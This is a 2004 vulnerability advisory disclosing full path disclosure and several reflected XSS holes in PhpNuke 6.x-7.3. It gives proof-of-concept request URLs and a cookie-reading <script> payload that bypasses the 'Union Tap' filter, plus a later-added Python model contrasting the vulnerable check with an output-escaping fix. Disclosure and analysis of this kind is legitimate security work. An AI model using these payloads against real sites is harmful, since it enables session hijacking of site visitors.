Message-ID: <20040517183423.64423.qmail@web50803.mail.yahoo.com>
From: come2waraxe at yahoo.com (Janek Vind)
Subject: [waraxe-2004-SA#030 - Multiple vulnerabilities in PhpNuke 6.x - 7.3]


{================================================================================}
{                              [waraxe-2004-SA#030]                              }
{================================================================================}
{                                                                                }
{               [ Multiple vulnerabilities in PhpNuke 6.x - 7.3 ]                }
{                                                                                }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 17. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=30


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management system, written in PHP by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
of websites, because it is freeware, easy to install and has a broad set of
features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So PhpNuke version 7.3 is out already and has improved security-wise.
Anyway, I have found many unpublished security flaws in it, not yet fixed in the
7.3 version, and one security hole is brand new - from the integrated nukecops
Union Tap ;)
Time is money, so let's start our journey into PhpNuke's (in)security world...


A. Full path disclosure:

A1 - full path disclosure through the unsanitized variable "show" in the
"WebLinks" module:

http://localhost/nuke73/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar

Warning: Division by zero in D:\apache_wwwroot\nuke73\modules\Web_Links\index.php on line 774

The non-numeric "show" value is used as a divisor, and because PHP's
display_errors is on, the warning (with the absolute filesystem path) is sent
to the client. Validating "show" as an integer fixes the warning; turning
display_errors off in production stops any remaining warnings from leaking
paths.



B. Cross-site scripting aka XSS:

B1 - XSS through the uninitialized variable "optionbox" in the "News" module:

http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=[xss code here]


B2 - XSS through the unsanitized variable "date" in the "Statistics" module:

http://localhost/nuke73/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss code here]


B3 - XSS through unsanitized variables in the "Stories_Archive" module:

http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=[xss code here]&month=05&month_l=May
http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss code here]&month_l=May
http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss code here]


B4 - XSS through unsanitized variables in the "Surveys" module:

http://localhost/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss code here]&order=0&thold=0
http://localhost/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0
http://localhost/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss code here]


B5 - XSS through the nukecops Union Tap SQL prevention code:

Well, you know, this is my favourite one - securing one hole will induce a
new one.
Let's look at the beginning of "mainfile.php" from PhpNuke 7.3:


//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
// The regex runs on the decoded query string, but $loc keeps the raw one;
// both $matches[1] and $loc are echoed below without any HTML escaping.
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER["QUERY_STRING"]), $matches)) {
	die("YOU ARE SLAPPED BY <a href=\"http://nukecops.com\">NUKECOPS</a> BY USING '$matches[1]' INSIDE '$loc'.");
}


So this clever code will catch unmasked SQL injection attempts made through a
"GET" request...
Let's try this request:

http://localhost/nuke73/index.php?foo=bar%20union%20select

and we see a nice message like this:

YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'foo=bar%20union%20select'.

Uh, how scary...
But what if we issue a request like this (try it with M$ Internet Explorer for
success! - IE sends "<" and ">" in the query string unencoded, so they reach
$_SERVER["QUERY_STRING"] verbatim, whereas a browser that percent-encodes them
leaves a harmless "%3Cscript%3E" in the reflected string):

http://localhost/nuke73/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>

Oops, a nice case of cross-site scripting! And because the anti-XSS filtering
code is located AFTER Union Tap, we can even use the most common "<script>"
tags...
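The reflection the Union Tap snippet performs, as an added example that is not part of the original advisory nor of the PhpNuke/nukecops code: a Python model of the check (same regex, same raw-versus-decoded handling of the query string) beside a hardened variant that HTML-escapes what it echoes, which is also the fix for the reflected parameters in B1-B4. The probe query strings are constructed here for illustration, and the names union_tap_original, union_tap_hardened and demo are assumptions of this example.

```python
"""Model of the PhpNuke 7.3 'Union Tap' check and of the reflected XSS it introduces."""
import html
import re
import urllib.parse
from typing import Optional

# Same character class and quantifier as the Union Tap beta 3 regex in
# mainfile.php: five characters from the set, followed by a space.
UNION_TAP_RE = re.compile(r"([OdWo5NIbpuU4V2iJT0n]{5}) ")

SLAP_PREFIX = 'YOU ARE SLAPPED BY <a href="http://nukecops.com">NUKECOPS</a> '


def union_tap_original(query_string: str) -> Optional[str]:
    """Mirror the original check (assumed name, not PhpNuke's own function).

    The regex runs against the decoded query string, but the message echoes
    the *raw* $_SERVER["QUERY_STRING"] ($loc) with no escaping, which is the
    reflected XSS the advisory describes.  Returns the text die() would emit,
    or None when the filter does not fire.
    """
    loc = query_string                        # $loc = $_SERVER["QUERY_STRING"]
    decoded = urllib.parse.unquote(loc)       # rawurldecode(): %XX only, '+' is left alone
    m = UNION_TAP_RE.search(decoded)
    if m is None:
        return None
    return SLAP_PREFIX + f"BY USING '{m.group(1)}' INSIDE '{loc}'."


def union_tap_hardened(query_string: str) -> Optional[str]:
    """Same detection, but every attacker-controlled value is HTML-escaped
    before it is placed in the response: the fix is output encoding, not a
    better blacklist."""
    loc = query_string
    m = UNION_TAP_RE.search(urllib.parse.unquote(loc))
    if m is None:
        return None
    return SLAP_PREFIX + f"BY USING '{html.escape(m.group(1))}' INSIDE '{html.escape(loc)}'."


# Constructed request query strings (not captured traffic).  The third is what
# a browser that percent-encodes '<' and '>' would send for the same attack.
PROBE_SQLI = "foo=bar%20union%20select"
PROBE_XSS_RAW = "foo=bar%20union%20select%20<script>alert(document.cookie);</script>"
PROBE_XSS_ENCODED = "foo=bar%20union%20select%20%3Cscript%3Ealert(document.cookie);%3C/script%3E"


def demo() -> dict:
    """Run the four scenarios and return each server response (or None)."""
    return {
        "sqli_original": union_tap_original(PROBE_SQLI),
        "xss_raw_original": union_tap_original(PROBE_XSS_RAW),
        "xss_encoded_original": union_tap_original(PROBE_XSS_ENCODED),
        "xss_raw_hardened": union_tap_hardened(PROBE_XSS_RAW),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running demo() shows the three behaviours the advisory relies on: the plain probe is "slapped" with the raw query string echoed back; the IE-style probe gets its literal <script> tag reflected into the page before any anti-XSS code runs; and the percent-encoded probe is still slapped but harmless, because "%3C" is what gets reflected. The hardened variant keeps the detection and reflects "&lt;script&gt;" instead.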

Heya to nukecops and have a nice day :)



How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Want to know how to patch those security holes? Then you are welcome to visit
the forum on my homepage at http://www.waraxe.us/forum/
See you there!



Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to all Bugtraq readers in Estonia! Tervitused!
(Greetings!)
Special greets to the http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


